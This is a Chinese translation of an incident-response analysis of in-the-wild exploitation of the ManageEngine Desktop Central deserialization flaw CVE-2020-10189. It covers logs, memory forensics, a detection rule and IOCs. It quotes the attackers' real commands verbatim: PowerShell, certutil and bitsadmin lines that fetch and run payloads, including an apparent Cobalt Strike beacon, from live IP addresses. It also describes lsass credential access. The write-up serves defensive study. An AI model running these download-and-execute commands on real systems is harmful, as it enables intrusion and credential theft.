0x01 漏洞披露

在研究Desktop Central漏洞的過(guò)程中，我們?cè)谕铺厣险业搅艘晃谎芯咳藛T的帖子，該研究人員于2020年3月5日披露了Desktop Central的RCE漏洞。

Zoho ManageEngine Desktop Central 10允許遠(yuǎn)程執(zhí)行代碼，漏洞成因是FileStorage類(lèi)的getChartImage中的不可信數(shù)據(jù)反序列化，此漏洞和CewolfServlet，MDMLogUploaderServlet Servlet有關(guān)。

對(duì)CVE-2020-10189的研究還顯示，可以在??Shodan??上搜索易受攻擊的Desktop Central服務(wù)器。

在公網(wǎng)發(fā)現(xiàn)的威脅是有可疑的PowerShell下載通訊錄，該通訊錄包含下載文件的說(shuō)明。

最早威脅活動(dòng)之一是一些可疑的PowerShell下載命令。該命令包含指令，以下載install.bat并storesyncsvc.dll到C:\Windows\Temp，然后立即執(zhí)行install.bat（圖3）。

cmd /c powershell $client = new-object System.Net.WebClient;$client.DownloadFile('http://66.42.98.220:12345/test/install.bat','C:\Windows\Temp\install.bat')&powershell $client = new-object System.Net.WebClient;$client.DownloadFile('http://66.42.98.220:12345/test/storesyncsvc.dll','C:\Windows\Temp\storesyncsvc.dll')&C:\Windows\Temp\install.bat
esktop Central服務(wù)器RCE漏洞在野攻擊分析

圖3-可疑的PowerShell下載命令

該install.bat腳本包含storesyncsvc.dll作為服務(wù)安裝在系統(tǒng)上的說(shuō)明。（圖4）。

??

圖4-Install.bat的內(nèi)容

在運(yùn)行PowerShell命令后，我們觀察到安裝了服務(wù)名稱(chēng)StorSyncSvc和顯示名稱(chēng)為Storage Sync Service（圖5）的新服務(wù)。

??

圖5-安裝Storage Sync Service

VirusTotal上的查詢(xún)結(jié)果表明，一些檢測(cè)引擎已經(jīng)歸類(lèi)storesyncsvc.dll為惡意軟件。

??https://www.virustotal.com/gui/file/f91f2a7e1944734371562f18b066f193605e07223aab90bd1e8925e23bbeaa1c/details??

0x02 利用過(guò)程跟蹤識(shí)別漏洞利用

此RCE漏洞已于2020年3月5日通過(guò)Twitter公開(kāi)。

回顧Sysmon流程創(chuàng)建事件，表明C:\ManageEngine\DesktopCentral_Server\jre\bin\java.exe流程是負(fù)責(zé)執(zhí)行PowerShell Download命令的流程（圖6）。

??

圖6-ParentImage負(fù)責(zé)PowerShell的下載

查看內(nèi)存中的進(jìn)程，我們還觀察到Desktop Central java.exe應(yīng)用程序cmd.exe和2.exe之間的父/子進(jìn)程關(guān)系（圖7）。

??

圖7- java.exe父/子進(jìn)程關(guān)系

0x03 利用文件系統(tǒng)識(shí)別漏洞利用

為了進(jìn)一步驗(yàn)證我們的理論，我們將從受影響的Desktop Central服務(wù)器收集的信息與已發(fā)布的POC進(jìn)行了比較，確定攻擊者可能利用了CVE-2020-10189漏洞在此易受攻擊的系統(tǒng)上運(yùn)行代碼。

通過(guò)文件系統(tǒng)時(shí)間軸分析，我們確定遍歷文件寫(xiě)可能已在具有文件名_chart（圖8）和logger.zip（圖9）的系統(tǒng)上發(fā)生   。

??

 圖8- _chart文件系統(tǒng)分析

??

圖9- logger.zip文件系統(tǒng)分析

這些文件名也在??@Steventseeley???發(fā)布的POC中進(jìn)行了??引用??（圖10）。

??

圖10-POC中對(duì)_chart和logger.zip的引用，參考：??https??? : ??//srcincite.io/pocs/src-2020-0011.py.txt??

0x04 引入系統(tǒng)命令

在隨后的流程創(chuàng)建日志中，cmd.exe使用certutil.exe命令來(lái)下載和執(zhí)行2.exe（圖11），進(jìn)一步的分析表明，很有可能   2.exe可能是C2工具Cobalt Strike的一部分。

cmd /c certutil -urlcache -split -f http://91.208.184.78/2.exe && 2.exe

??

圖11-Certutil命令

OSINT透露2.exe已被VirusTotal上的多個(gè)檢測(cè)引擎識(shí)別為惡意軟件：??https???：??//www.virustotal.com/gui/file/d854f775ab1071eebadc0eb44d8571c387567c233a71d2e26242cd9a80e67309/details??

利用app.any.run沙箱（圖12）和對(duì)惡意軟件的內(nèi)存分析，進(jìn)一步證實(shí)2.exe托管Cobalt Strike Beacon payload的可能性。

??

圖12- 2.exe被判定為惡意軟件

??https://any.run/report/d854f775ab1071eebadc0eb44d8571c387567c233a71d2e26242cd9a80e67309/e65dd4ff-60c6-49a4-8e6d-94c6c80a74b6??

我們對(duì)已知惡意軟件2.exe所使用的所有內(nèi)存段進(jìn)行了yara掃描，yara掃描結(jié)果進(jìn)一步支持了2.exe在其他幾種可能的惡意軟件簽名的理論（圖13）。

??

圖13-Yarascan掃描結(jié)果

利用Volatility的惡意插件，我們確定了幾個(gè)可能存在代碼注入跡象的內(nèi)存部分，我們對(duì)另一個(gè)由malfind轉(zhuǎn)儲(chǔ)的內(nèi)存段進(jìn)行了yara掃描，進(jìn)一步證實(shí)了我們的猜想。

在下面的記錄中可以看到整個(gè)過(guò)程（圖14）。

（原文中查看完整過(guò)程）

圖14-Yarascan驗(yàn)證結(jié)果

然后，我們檢查了malfind的輸出以獲得代碼注入的證據(jù)，并確定了其中的可疑內(nèi)存部分svchost.exe（圖15）。OSINT的研究使我們找到了一位研究人員，該研究人員對(duì)惡意軟件進(jìn)行了逆向，并找到了負(fù)責(zé)向其中注入代碼的部分svchost.exe（圖16）。

??

 圖15-對(duì)包含注入代碼的svchost的分析

??

圖16-@VK_Intel的分析顯示了可能的注入功能

參考：

在攻擊結(jié)束后，我們觀察到了惡意的Bitsadmin命令，其中包含install.bat從66.42.96.220可疑端口12345進(jìn)行轉(zhuǎn)移的指令。

我們的分析師觀察到，bitsadmin命令正在Desktop Central服務(wù)器上運(yùn)行，該命令包含在PowerShell下載命令中調(diào)用的相同IP地址，端口和相同的install.bat文件（圖17）。

cmd /c bitsadmin /transfer bbbb http://66.42.98.220:12345/test/install.bat C:\Users\Public\install.bat

??

圖17-Bitsadmin命令

0x05 訪問(wèn)憑證

我們還觀察到了潛在的憑證訪問(wèn)活動(dòng)。攻擊者執(zhí)行憑據(jù)轉(zhuǎn)儲(chǔ)的常用技術(shù)是使用惡意進(jìn)程（SourceImage）訪問(wèn)另一個(gè)進(jìn)程（TargetImage），最常見(jiàn)的是將lsass.exe作為目標(biāo)，因?yàn)樗ǔ０舾行畔?，例如帳?hù)憑據(jù)。

在這里，我們觀察到SourceImage 2.exe訪問(wèn)TargetImage lsass.exe（圖18）。Cobalt Strike Beacon包含類(lèi)似于??Mimikatz的??本機(jī)憑證轉(zhuǎn)儲(chǔ)功能，使用此功能的唯一必要條件是攻擊者具有的SYSTEM特權(quán)，以下事件提供了充分的證據(jù)證明憑證訪問(wèn)的風(fēng)險(xiǎn)很高。

??

圖18- 2.exe訪問(wèn)lsass.exe

在對(duì)這種入侵進(jìn)行分析的過(guò)程中，我們向Eric Zimmerman的??KAPE???工具添加了一些收集目標(biāo)功能，以將??相關(guān)日志??添加到分類(lèi)工作中。

工具地址：??https://binaryforay.blogspot.com/2019/02/introducing-kape.html??

針對(duì)相關(guān)日志的用法示例：

kape.exe --tsource C: --tdest c:\temp\tout --tflush --target ManageEngineLogs

Sigma項(xiàng)目的Florian Roth創(chuàng)建了一個(gè)簽名來(lái)檢測(cè)攻擊者利用的某些技術(shù)：

??https://github.com/Neo23x0/sigma/blob/master/rules/windows/process_creation/win_exploit_cve_2020_10189.yml??

我們對(duì)該攻擊的分析還發(fā)現(xiàn)，在進(jìn)程創(chuàng)建日志中基于命令行活動(dòng)進(jìn)行檢測(cè)將很有價(jià)值：

ParentImage | endswith: 
  'DesktopCentral_Server\jre\bin\java.exe'
 CommandLine | contains: 
  '*powershell*'
  '*certutil*'
  '*bitsadmin*'

0x06 IOCs

·Storesyncsvc.dll

· MD5: 5909983db4d9023e4098e56361c96a6f

· SHA256: f91f2a7e1944734371562f18b066f193605e07223aab90bd1e8925e23bbeaa1c

·Install.bat

· MD5: 7966c2c546b71e800397a67f942858d0

· SHA256: de9ef08a148305963accb8a64eb22117916aa42ab0eddf60ccb8850468a194fc

·2.exe

· MD5: 3e856162c36b532925c8226b4ed3481c

· SHA256: d854f775ab1071eebadc0eb44d8571c387567c233a71d2e26242cd9a80e67309

· 66[.]42[.]98[.]220

· 91[.]208[.]184[.]78

· 74[.]82[.]201[.]8

本文翻譯自：https://blog.reconinfosec.com/analysis-of-exploitation-cve-2020-10189/ https://nvd.nist.gov/vuln/detail/CVE-2020-10189#vulnCurrentDescriptionTitle如若轉(zhuǎn)載，請(qǐng)注明原文地址